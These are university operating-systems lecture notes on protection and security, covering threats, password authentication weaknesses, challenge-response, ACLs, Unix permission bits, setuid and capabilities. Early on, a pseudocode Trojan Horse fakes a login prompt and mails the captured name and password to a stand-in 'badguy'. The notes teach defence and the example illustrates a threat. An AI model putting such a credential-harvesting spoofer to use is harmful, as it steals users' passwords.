CS 537
Lecture Notes, Part 12
Protection and Security

Previous More About File Systems

Next Cryptographic Protocols
Contents

The terms protection and security are often used together, and the distinction between them is a bit blurred, but security is generally used in a broad sense to refer to all concerns about controlled access to facilities, while protection describes specific technological mechanisms that support security.

Security

As in any other area of software design, it is important to distinguish between policies and mechanisms. Before you can start building machinery to enforce policies, you need to establish what policies you are trying to enforce. Many years ago, I heard a story about a software firm that was hired by a small savings and loan corporation to build a financial accounting system. The chief financial officer used the system to embezzle millions of dollars and fled the country. The losses were so great the S&L went bankrupt, and the loss of the contract was so bad the software company also went belly-up. Did the accounting system have a good or bad security design? The problem wasn't unauthorized access to information, but rather authorization to the wrong person. The situation is analogous to the old saw that every program is correct according to some specification. Unfortunately, we don't have the space here to go into the whole question of security policies here. We will just assume that terms like “authorized access” have some well-defined meaning in a particular context.

Threats

Any discussion of security must begin with a discussion of threats. After all, if you don't know what you're afraid of, how are you going to defend against it? Threats are generally divided in three main categories.

Unauthorized disclosure. A “bad guy” gets to see information he has no right to see (according to some policy that defines “bad guy” and “right to see”).
Unauthorized updates. The bad guy makes changes he has no right to change.
Denial of service. The bad guy interferes with legitimate access by other users.

There is a wide spectrum of denial-of-service threats. At one end, it overlaps with the previous category. A bad guy deleting a good guy's file could be considered an unauthorized update. A the other end of the spectrum, blowing up a computer with a hand grenade is not usually considered an unauthorized update. As this second example illustrates, some denial-of-service threats can only be enforced by physical security. No matter how well your OS is designed, it can't protect my files from his hand grenade. Another form of denial-of-service threat comes from unauthorized consumption of resources, such as filling up the disk, tying up the CPU with an infinite loop, or crashing the system by triggering some bug in the OS. While there are software defenses against these threats, they are generally considered in the context of other parts of the OS rather than security and protection. In short, discussion of software mechanisms for computer security generally focus on the first two threats.

In response to these threats counter measures also fall into various categories. As programmers, we tend to think of technological tricks, but it is also important to realize that a complete security design must involve physical components (such as locking the computer in a secure building with armed guards outside) and human components (such as a background check to make sure your CFO isn't a crook, or checking to make sure those armed guards aren't taking bribes).

The Trojan Horse

Break-in techniques come in numerous forms. One general category of attack that comes in a great variety of disguises is the Trojan Horse scam. The name comes from Greek mythology. The ancient Greeks were attacking the city of Troy, which was surrounded by an impenetrable wall. Unable to get in, they left a huge wooden horse outside the gates as a “gift” and pretended to sail away. The Trojans brought the horse into the city, where they discovered that the horse was filled with Greek soldiers who defeated the Trojans to win the Rose Bowl (oops, wrong story). In software, a Trojan Horse is a program that does something useful--or at least appears to do something useful--but also subverts security somehow. In the personal computer world, Trojan horses are often computer games infected with “viruses.”

Here's the simplest Trojan Horse program I know of. Log onto a public terminal and start a program that does something like this:


    print("login:");
    name = readALine();
    turnOffEchoing();
    print("password:");
    passwd = readALine();
    sendMail("badguy",name,passwd);
    print("login incorrect");
    exit();

A user waking up to the terminal will think it is idle. He will attempt to log in, typing his login name and password. The Trojan Horse program sends this information to the bad guy, prints the message login incorrect and exits. After the program exits, the system will generate a legitimate login: message and the user, thinking he mistyped his password (a common occurrence because the password is not echoed) will try again, log in successfully, and have no suspicion that anything was wrong. Note that the Trojan Horse program doesn't actually have to do anything useful, it just has to appear to.

Design Principles

Public Design. A common mistake is to try to keep a system secure by keeping its algorithms secret. That's a bad idea for many reasons. First, it gives a kind of all-or-nothing security. As soon as anybody learns about the algorithm, security is all gone. In the words of Benjamin Franklin, “Two people can keep a secret if one of them is dead.” Second, it is usually not that hard to figure out the algorithm, by seeing how the system responds to various inputs, decompiling the code, etc. Third, publishing the algorithm can have beneficial effects. The bad guys probably have already figured out your algorithm and found its weak points. If you publish it, perhaps some good guys will notice bugs or loopholes and tell you about them so you can fix them.
Default = No Access. Start out by granting as little access a possible and adding privileges only as needed. If you forget to grant access where it is legitimately needed, you'll soon find out about it. Users seldom complain about having too much access.
Timely Checks. Checks tend to “wear out.” For example, the longer you use the same password, the higher the likelihood it will be stolen or deciphered. Be careful: This principle can be overdone. Systems that force users to change passwords frequently encourage them to use particularly bad ones. A system that forced users to supply a password every time they wanted to open a file would inspire all sorts of ingenious ways to avoid the protection mechanism altogether.
Minimum Privilege. This is an extension of point 2. A person (or program or process) should be given just enough powers to get the job done. In other contexts, this principle is called “need to know.” It implies that the protection mechanism has to support fine-grained control.
Simple, Uniform Mechanisms. Any piece of software should be as simple as possible (but no simpler!) to maximize the chances that it is correctly and efficiently implemented. This is particularly important for protection software, since bugs are likely be usable as security loopholes. It is also important that the interface to the protection mechanisms be simple, easy to understand, and easy to use. It is remarkably hard to design good, foolproof security policies; policy designers need all the help they can get.
Appropriate Levels of Security. You don't store your best silverware in a box on the front lawn, but you also don't keep it in a vault at the bank. The US Strategic Air Defense calls for a different level of security than my records of the grades for this course. Not only does excessive security mechanism add unnecessary cost and performance degradation, it can actually lead to a less secure system. If the protection mechanisms are too hard to use, users will go out of their way to avoid using them.

Authentication

Authentication is a process by which one party convinces another of its identity. A familiar instance is the login process, though which a human user convinces the computer system that he has the right to use a particular account. If the login is successful, the system creates a process and associates with it the internal identifier that identifies the account. Authentication occurs in other contexts, and it isn't always a human being that is being authenticated. Sometimes a process needs to authenticate itself to another process. In a networking environment, a computer may need to authenticate itself to another computer. In general, let's call the party that whats to be authenticated the client and the other party the server.

One common technique for authentication is the use of a password. This is the technique used most often for login. There is a value, called the password that is known to both the server and to legitimate clients. The client tells the server who he claims to be and supplies the password as proof. The server compares the supplied password with what he knows to be the true password for that user.

Although this is a common technique, it is not a very good one. There are lots of things wrong with it.

Direct attacks on the password.

The most obvious way of breaking in is a frontal assault on the password. Simply try all possible passwords until one works. The main defense against this attack is the time it takes to try lots of possibilities. If the client is a computer program (perhaps masquerading as a human being), it can try lots of combinations very quickly, but by if the password is long enough, even the fastest computer cannot try succeed in a reasonable amount of time. If the password is a string of 8 letters and digits, there are 2,821,109,907,456 possibilities. A program that tried one combination every millisecond would take 89 years to get through them all. If users are allowed to pick their own passwords, they are likely to choose “cute doggie names”, common words, names of family members, etc. That cuts down the search space considerably. A password cracker can go through dictionaries, lists of common names, etc. It can also use biographical information about the user to narrow the search space. There are several defenses against this sort of attack.

The system chooses the password. The problem with this is that the password will not be easy to remember, so the user will be tempted to write it down or store it in a file, making it easy to steal. This is not a problem if the client is not a human being.
The system rejects passwords that are too “easy to guess”. In effect, it runs a password cracker when the user tries to set his password and rejects the password if the cracker succeeds. This has many of the disadvantages of the previous point. Besides, it leads to a sort of arms race between crackers and checkers.
The password check is artificially slowed down, so that it takes longer to go through lots of possibilities. One variant of this idea is to hang up a dial-in connection after three unsuccessful login attempts, forcing the bad guy to take the time to redial.

Eavesdropping.

This is a far bigger program for passwords than brute force attacks. In comes in many disguises.

Looking over someone's shoulder while he's typing his password. Most systems turn off echoing, or echo each character as an asterisk to mitigate this problem.
Reading the password file. In order to verify that the password is correct, the server has to have it stored somewhere. If the bad guy can somehow get access to this file, he can pose as anybody. While this isn't a threat on its own (after all, why should the bad guy have access to the password file in the first place?), it can magnify the effects of an existing security lapse.
Unix introduced a clever fix to this problem, that has since been almost universally copied. Use some hash function f and instead of storing password, store f(password). The hash function should have two properties: Like any hash function it should generate all possible result values with roughly equal probability, and in addition, it should be very hard to invert--that is, given f(password), it should be hard to recover password. It is quite easy to devise functions with these properties. When a client sends his password, the server applies f to it and compares the result with the value stored in the password file. Since only f(password) is stored in the password file, nobody can find out the password for a given user, even with full access to the password file, and logging in requires knowing password, not f(password). In fact, this technique is so secure, it has become customary to make the password file publicly readable!
Wire tapping. If the bad guy can somehow intercept the information sent from the client to the server, password-based authentication breaks down altogether. It is increasingly the case the authentication occurs over an insecure channel such as a dial-up line or a local-area network. Note that the Unix scheme of storing f(password) is of no help here, since the password is sent in its original form (“plaintext” in the jargon of encryption) from the client to the server. We will consider this problem in more detail below.

Spoofing.

This is the worst threat of all. How does the client know that the server is who it appears to be? If the bad guy can pose as the server, he can trick the client into divulging his password. We saw a form of this attack above. It would seem that the server needs to authenticate itself to the client before the client can authenticate itself to the server. Clearly, there's a chicken-and-egg problem here. Fortunately, there's a very clever and general solution to this problem.

Challenge-response.

There are wide variety of authentication protocols, but they are all based on a simple idea. As before, we assume that there is a password known to both the (true) client and the (true) server. Authentication is a four-step process.

The client sends a message to the server saying who he claims to be and requesting authentication.
The server sends a challenge to the client consisting of some random value x.
The client computes g(password,x) and sends it back as the response. Here g is a hash function similar to the function f above, except that it has two arguments. It should have the property that it is essentially impossible to figure out password even if you know both x and g(password,x).
The server also computes g(password,x) and compares it with the response it got from the client.

Clearly this algorithm works if both the client and server are legitimate. An eavesdropper could learn the user's name, x and g(password,x), but that wouldn't help him pose as the user. If he tried to authenticate himself to the server he would get a different challenge x', and would have no way to respond. Even a bogus server is no threat. The change provides him with no useful information. Similarly, a bogus client does no harm to a legitimate server except for tying him up in a useless exchange (a denial-of-service problem!).

Protection Mechanisms

First, some terminology:

objects: The things to which we wish to control access. They include physical (hardware) objects as well as software objects such as files, databases, semaphores, or processes. As in object-oriented programming, each object has a type and supports certain operations as defined by its type. In simple protection systems, the set of operations is quite limited: read, write, and perhaps execute, append, and a few others. Fancier protection systems support a wider variety of types and operations, perhaps allowing new types and operations to be dynamically defined.
principals: Intuitively, “users”--the ones who do things to objects. Principals might be individual persons, groups or projects, or roles, such as “administrator.” Often each process is associated with a particular principal, the owner of the process.
rights: Permissions to invoke operations. Each right is the permission for a particular principal to perform a particular operation on a particular object. For example, principal solomon might have read rights for a particular file object.
domains: Sets of rights. Domains may overlap. Domains are a form of indirection, making it easier to make wholesale changes to the access environment of a process. There may be three levels of indirection: A principal owns a particular process, which is in a particular domain, which contains a set of rights, such as the right to modify a particular file.

Conceptually, the protection state of a system is defined by an access matrix. The rows correspond to principals (or domains), the columns correspond to objects, and each cell is a set of rights. For example, if


    access[solomon]["/tmp/foo"] = { read, write }

Then I have read and write access to file "/tmp/foo". I say “conceptually” because the access is never actually stored anywhere. It is very large and has a great deal of redundancy (for example, my rights to a vast number of objects are exactly the same: none!), so there are much more compact ways to represent it. The access information is represented in one of two ways, by columns, which are called access control lists (ACLs), and by rows, called capability lists.

Access Control Lists

An ACL (pronounced “ackle”) is a list of rights associated with an object. A good example of the use of ACLs is the Andrew File System (AFS) originally created at Carnegie-Mellon University and now marketed by Transarc Corporation as an add-on to Unix. This file system is widely used in the Computer Sciences Department. Your home directory is in AFS. AFS associates an ACL with each directory, but the ACL also defines the rights for all the files in the directory (in effect, they all share the same ACL). You can list the ACL of a directory with the fs listacl command:


    % fs listacl /u/c/s/cs537-1/public
    Access list for /u/c/s/cs537-1/public is
    Normal rights:
      system:administrators rlidwka
      system:anyuser rl
      solomon rlidwka

The entry system:anyuser rl means that the principal system:anyuser (which represents the role “anybody at all”) has rights r (read files in the directory) and l (list the files in the directory and read their attributes). The entry solomon rlidwka means that I have all seven rights supported by AFS. In addition to r and l, they include the rights to insert new file in the the directory (i.e., create files), delete files, write files, lock files, and administer the ACL list itself. This last right is very powerful: It allows me to add, delete, or modify ACL entries. I thus have the power to grant or deny any rights to this directory to anybody. The remaining entry in the list shows that the principal system:administrators has the same rights I do (namely, all rights). This principal is the name of a group of other principals. The command pts membership system:administrators lists the members of the group.

Ordinary Unix also uses an ACL scheme to control access to files, but in a much stripped-down form. Each process is associated with a user identifier (uid) and a group identifier (gid), each of which is a 16-bit unsigned integer. The inode of each file also contains a uid and a gid, as well as a nine-bit protection mask, called the mode of the file. The mask is composed of three groups of three bits. The first group indicates the rights of the owner: one bit each for read access, write access, and execute access (the right to run the file as a program). The second group similarly lists the rights of the file's group, and the remaining three three bits indicate the rights of everybody else. For example, the mode 111 101 101 (0755 in octal) means that the owner can read, write, and execute the file, while members of the owning group and others can read and execute, but not write the file. Programs that print the mode usually use the characters rwx- rather than 0 and 1. Each zero in the binary value is represented by a dash, and each 1 is represented by r, w, or x, depending on its position. For example, the mode 111101101 is printed as rwxr-xr-x.

In somewhat more detail, the access-checking algorithm is as follows: The first three bits are checked to determine whether an operation is allowed if the uid of the file matches the uid of the process trying to access it. Otherwise, if the gid of the file matches the gid of the process, the second three bits are checked. If neither of the id's match, the last three bits are used. The code might look something like this.


    boolean accessOK(Process p, Inode i, int operation) {
        int mode;
        if (p.uid == i.uid)
            mode = i.mode >> 6;
        else if (p.gid == i.gid)
            mode = i.mode >> 3;
        else mode = i.mode;
        switch (operation) {
            case READ: mode &= 4; break;
            case WRITE: mode &= 2; break;
            case EXECUTE: mode &= 1; break;
        }
        return (mode != 0);
    }

(The expression i.mode >> 3 denotes the value i.mode shifted right by three bits positions and the operation mode &= 4 clears all but the third bit from the right of mode.) Note that this scheme can actually give a random user more powers over the file than its owner. For example, the mode ---r--rw- (000 100 110 in binary) means that the owner cannot access the file at all, while members of the group can only read the file, and other can both read and write. On the other hand, the owner of the file (and only the owner) can execute the chmod system call, which changes the mode bits to any desired value. When a new file is created, it gets the uid and gid of the process that created it, and a mode supplied as an argument to the creat system call.

Most modern versions of Unix actually implement a slightly more flexible scheme for groups. A process has a set of gid's, and the check to see whether the file is in the process' group checks to see whether any of the process' gid's match the file's gid.


    boolean accessOK(Process p, Inode i, int operation) {
        int mode;
        if (p.uid == i.uid)
            mode = i.mode >> 6;
        else if (p.gidSet.contains(i.gid))
            mode = i.mode >> 3;
        else mode = i.mode;
        switch (operation) {
            case READ: mode &= 4; break;
            case WRITE: mode &= 2; break;
            case EXECUTE: mode &= 1; break;
        }
        return (mode != 0);
    }

When a new file is created, it gets the uid of the process that created it and the gid of the containing directory. There are system calls to change the uid or gid of a file. For obvious security reasons, these operations are highly restricted. Some versions of Unix only allow the owner of the file to change it gid, only allow him to change it to one of his gid's, and don't allow him to change the uid at all.

For directories, “execute” permission is interpreted as the right to get the attributes of files in the directory. Write permission is required to create or delete files in the directory. This rule leads to the surprising result that you might not have permission to modify a file, yet be able to delete it and replace it with another file of the same name but with different contents!

Unix has another very clever feature--so clever that it is patented! The file mode actually has a few more bits that I have not mentioned. One of them is the so-called setuid bit. If a process executes a program stored in a file with the setuid bit set, the uid of the process is set equal to the uid of the file. This rather curious rule turns out to be a very powerful feature, allowing the simple rwx permissions directly supported by Unix to be used to define arbitrarily complicated protection policies.

As an example, suppose you wanted to implement a mail system that works by putting all mail messages in to one big file, say /usr/spool/mbox. I should be able to read only those message that mention me in the To: or Cc: fields of the header. Here's how to use the setuid feature to implement this policy. Define a new uid mail, make it the owner of /usr/spool/mbox, and set the mode of the file to rw------- (i.e., the owner mail can read and write the file, but nobody else has any access to it). Write a program for reading mail, say /usr/bin/readmail. This file is also owned by mail and has mode srwxr-xr-x. The ‘s’ means that the setuid bit is set. My process can execute this program (because the “execute by anybody” bit is on), and when it does, it suddenly changes its uid to mail so that it has complete access to /usr/spool/mbox. At first glance, it would seem that letting my process pretend to be owned by another user would be a big security hole, but it isn't, because processes don't have free will. They can only do what the program tells them to do. While my process is running readmail, it is following instructions written by the designer of the mail system, so it is safe to let it have access appropriate to the mail system. There's one more feature that helps readmail do its job. A process really has two uid's, called the effective uid and the real uid. When a process executes a setuid program, its effective uid changes to the uid of the program, but its real uid remains unchanged. It is the effective uid that is used to determine what rights it has to what files, but there is a system call to find out the real uid of the current process. Readmail can use this system call to find out what user called it, and then only show the appropriate messages.

Capabilities

An alternative to ACLs are capabilities. A capability is a “protected pointer” to an object. It designates an object and also contains a set of permitted operations on the object. For example, one capability may permit reading from a particular file, while another allows both reading and writing. To perform an operation on an object, a process makes a system call, presenting a capability that points to the object and permits the desired operation. For capabilities to work as a protection mechanism, the system has to ensure that processes cannot mess with their contents. There are three distinct ways to ensure the integrity of a capability.

Tagged architecture.: Some computers associate a tag bit with each word of memory, marking the word as a capability word or a data word. The hardware checks that capability words are only assigned from other capability words. To create or modify a capability, a process has to make a kernel call.
Separate capability segments.: If the hardware does not support tagging individual words, the OS can protect capabilities by putting them in a separate segment and using the protection features that control access to segments.
Encryption.: Each capability can be extended with a cryptographic checksum that is computed from the rest of the content of the capability and a secret key. If a process modifies a capability it cannot modify the checksum to match without access to the key. Only the kernel knows the key. Each time a process presents a capability to the kernel to invoke an operation, the kernel checks the checksum to make sure the capability hasn't been tampered with.

Capabilities, like segments are a “good idea” that somehow seldom seems to be implemented in real systems in full generality. Like segments, capabilities show up in an abbreviated form in many systems. For example, the file descriptor for an open file in Unix is a kind of capability. When a process tries to open a file for writing, the system checks the file's ACL to see whether the access is permitted. If it is, the process gets a file descriptor for the open file, which is a sort of capability to the file that permits write operations. Unix uses the separate segment approach to protect the capability. The capability itself is stored in a table in the kernel and the process has only an indirect reference to it (the index of the slot in the table). File descriptors are not full-fledged capabilities, however. For example, they cannot be stored in files, because they go away when the process terminates.

Previous More About File Systems
Next Cryptographic Protocols
Contents

solomon@cs.wisc.edu
Tue Jan 16 14:33:41 CST 2007

CS 537Lecture Notes, Part 12Protection and Security

Contents

Direct attacks on the password.

Eavesdropping.

Spoofing.

CS 537
Lecture Notes, Part 12
Protection and Security